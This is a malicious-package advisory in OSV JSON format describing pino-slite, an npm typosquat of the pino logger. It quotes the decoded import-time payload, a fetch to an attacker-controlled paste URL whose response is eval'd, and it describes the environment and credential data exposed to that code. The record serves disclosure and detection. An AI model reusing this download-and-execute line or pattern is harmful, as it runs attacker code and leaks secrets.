{"id":"MAL-2026-6078","summary":"Malicious code in pino-slite (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (ea546461f3101a972511a0bb9d66b73849904ad3522724d1670b003e108c11bb)\npino-slite impersonates the legitimate `pino` logger (README titled 'pino-slite (Pino)' with badges and homepage pointing to getpino.io, exported function named `pino`). On require(), lib/writer.js (loaded transitively from the package main pino.js) decodes a base64 string and passes it to eval(atob(hash)). The decoded payload performs `fetch('https://jsonkeeper.com/b/0DWFC').then(r=\u003er.json()).then(d=\u003e{eval(d.ret);})`, executing attacker-controlled JavaScript fetched from a mutable third-party paste host on every load. Immediately before the eval, the module assembles a `data` object containing `{...process.env, version, platform: os.platform(), hostname: os.hostname(), username: os.userInfo().username, macAddresses: \u003cnon-internal IPv4 MACs\u003e}`, which is in scope for the remotely-fetched code — providing a ready-made channel to exfiltrate the installer's full environment (CI secrets, AWS_*, NPM_TOKEN, GH tokens, etc.) and host identifiers. This combines a typosquat lure, an import-time RCE dropper from an attacker-controlled mutable URL, and an environment-credential harvester.\n","modified":"2026-06-17T22:01:48.280824847Z","published":"2026-06-17T21:40:46Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-06-17T21:40:46Z","versions":["4.1.16"],"source":"amazon-inspector","id":"IN-MAL-2026-006944","sha256":"7ed71e73ac59b29f0867d2fbb15fc0391049b1ba4fe3c7b310bfbd1e84067c9e","import_time":"2026-06-17T21:42:18.197754588Z"},{"modified_time":"2026-06-17T21:40:49Z","versions":["4.1.12"],"source":"amazon-inspector","import_time":"2026-06-17T21:42:18.296198728Z","sha256":"ea546461f3101a972511a0bb9d66b73849904ad3522724d1670b003e108c11bb","id":"IN-MAL-2026-006945"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/pino-slite/v/4.1.16"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/pino-slite/v/4.1.12"}],"affected":[{"package":{"name":"pino-slite","ecosystem":"npm","purl":"pkg:npm/pino-slite"},"versions":["4.1.16","4.1.12"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pino-slite/MAL-2026-6078.json","cwes":[{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"}],"indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-TUxVgdCfhTtdPbyD/tiDcnbJlDO8HxSebYFT2UBAHexWwVdEDqxT6uHDzdP0+uhHU0egoOWk5dY8NqCioL3+dA==","sha1":"1e3cc2363b6a71bdcb7ae8e3052c3b557fbbbd8f"},"filename":"pino-slite-4.1.16.tgz"}],"evidence_files":[{"tlsh":"c61104a195e7649816302be10cc74820bed5b3423197809cbabcc5d52fe7ce17195f70","path":"lib/writer.js","sha256":"b6a7f0998e9b8ce77f9492f1156159f143faded6f9d27a790d19e4af8a7d221f"},{"tlsh":"b3016425ce688e6309d92992882d1187aa60ad6b980cfc2c73c3631d0f8d57f19be57d","path":"package.json","sha256":"e84dbee6692b3b39e05a3f3a0873c248336ce1690c1d3141f0ae2e12466c016b"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}